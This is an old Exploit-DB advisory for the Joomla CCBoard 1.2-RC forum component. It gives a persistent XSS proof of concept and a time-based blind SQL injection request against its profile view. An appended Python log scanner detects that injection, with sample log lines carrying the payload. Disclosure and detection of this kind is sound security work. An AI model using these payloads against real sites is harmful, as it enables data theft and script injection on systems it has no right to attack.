Joomla! Component CCBoard 1.2-RC – Multiple Vulnerabilities

  • Author: jdc
    Date: 2010-11-13
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/15518/
  • # Exploit Title: Joomla Component com_ccboard Multiple Vulnerabilities
    # Date: 13 Nov 2010
    # Author: jdc
    # Category: webapps/0day
    # Version: 1.2-RC
    # Download: http://codeclassic.org/the-downloads/joomla-extensionscomponents/292-ccboard-bulletin-board-forum.html
    
    
    Persistent XSS
    --------------
    ccBoard doesn't filter its posts for HTML... at all:
    <script>prompt(1)</script>
    
    
    Blind SQL Injection
    -------------------
    NOTE: must be logged in
    ?option=com_ccboard
    &view=myprofile
    &cid=63 and benchmark(5000000,md5(1))
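
An added detection example (not part of the original advisory or ccBoard's code): a Python scan of web access logs that flags `com_ccboard` requests whose `cid` parameter is not a plain integer, as in the blind SQL injection request above. The log lines are constructed samples in combined log format, and the function name is hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not from the advisory.
# The third entry logs the request with raw spaces, as some servers do.
SAMPLE_LOG = """\
198.51.100.7 - - [13/Nov/2010:10:00:01 +0000] "GET /index.php?option=com_ccboard&view=myprofile&cid=63 HTTP/1.1" 200 5120
198.51.100.9 - - [13/Nov/2010:10:00:05 +0000] "GET /index.php?option=com_ccboard&view=myprofile&cid=63%20and%20benchmark(5000000,md5(1)) HTTP/1.1" 200 5120
203.0.113.4 - - [13/Nov/2010:10:00:09 +0000] "GET /index.php?option=com_ccboard&view=myprofile&cid=63 and benchmark(5000000,md5(1)) HTTP/1.1" 200 5120
198.51.100.7 - - [13/Nov/2010:10:00:12 +0000] "GET /index.php?option=com_content&view=article&id=4 HTTP/1.1" 200 2048
"""

# Client address, then the request target. The target is matched lazily up to
# the protocol token so that targets containing raw spaces are still captured.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
INTEGER_RE = re.compile(r"[0-9]+")


def suspicious_cid_requests(log_text):
    """Return (client, decoded cid) for com_ccboard requests with a non-integer cid."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        # parse_qs URL-decodes values, so %20 and + encodings are normalised.
        params = parse_qs(urlsplit(target).query)
        if "com_ccboard" not in params.get("option", []):
            continue
        for value in params.get("cid", []):
            if not INTEGER_RE.fullmatch(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_cid_requests(SAMPLE_LOG):
        print(f"{client}: non-integer cid {value!r}")
```

The check only sees parameters that reach the access log, so requests that carry `cid` in a POST body need the same test applied at the application or WAF layer.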